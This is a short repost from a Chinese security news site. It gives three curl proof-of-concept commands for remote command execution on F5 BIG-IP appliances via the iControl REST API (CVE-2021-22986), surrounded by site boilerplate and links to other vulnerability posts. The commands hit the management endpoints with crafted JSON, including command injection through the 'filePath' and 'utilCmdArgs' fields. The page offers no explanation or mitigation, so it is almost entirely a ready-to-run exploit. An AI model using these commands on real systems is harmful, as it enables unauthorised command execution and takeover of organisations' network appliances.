F5 BIG-IP iControl RCE (CVE-2021-22986)

2021年12月7日05:25:52评论103 views字数 473阅读1分34秒阅读模式

PoC #1

curl -su admin: -H "Content-Type: application/json" http://[victimIP]/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}'

PoC #2

curl -ks https://[victimIP]/mgmt/shared/authn/login -d '{"bigipAuthCookie":"","loginReference":{"link":"http://localhost/mgmt/tm/access/bundle-install-tasks"},"filePath":"`id`"}'

PoC #3

curl -ksu admin:[redacted] https://[vimtimIP]/mgmt/tm/access/bundle-install-tasks -d '{"filePath":"id"}'

本文始发于微信公众号（Khan安全攻防实验室）：F5 BIG-IP iControl RCE (CVE-2021-22986)

左青龙
微信扫一扫

右白虎
微信扫一扫

本文由 admin 发表于 2021年12月7日05:25:52
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
F5 BIG-IP iControl RCE (CVE-2021-22986)http://cn-sec.com/archives/534835.html

在线咨询

13688888888

8888 QQ在线咨询

微信
本页二维码

F5 BIG-IP iControl RCE (CVE-2021-22986)

【已复现】CrushFTP 服务器端模板注入漏洞(CVE-2024-4040)安全风险通告

（CVE-2024-3400）Palo Alto Networks PAN-OS 命令执行漏洞

校园网自助服务系统存在SQL注入漏洞

玲珑-login-bypass登录绕过漏洞复现

用友-政务-FileDownload-任意文件读取漏洞复现

卡车卫星定位系统/user/create存在未授权密码重置漏洞

用友-U8-Cloud-TableInputOperServlet存在反序列化漏洞

CVE-2024-26503

致远互联 OA fileUpload.do 文件上传漏洞

某世界500强企业|存在通杀漏洞(0day)

发表评论

在线咨询

微信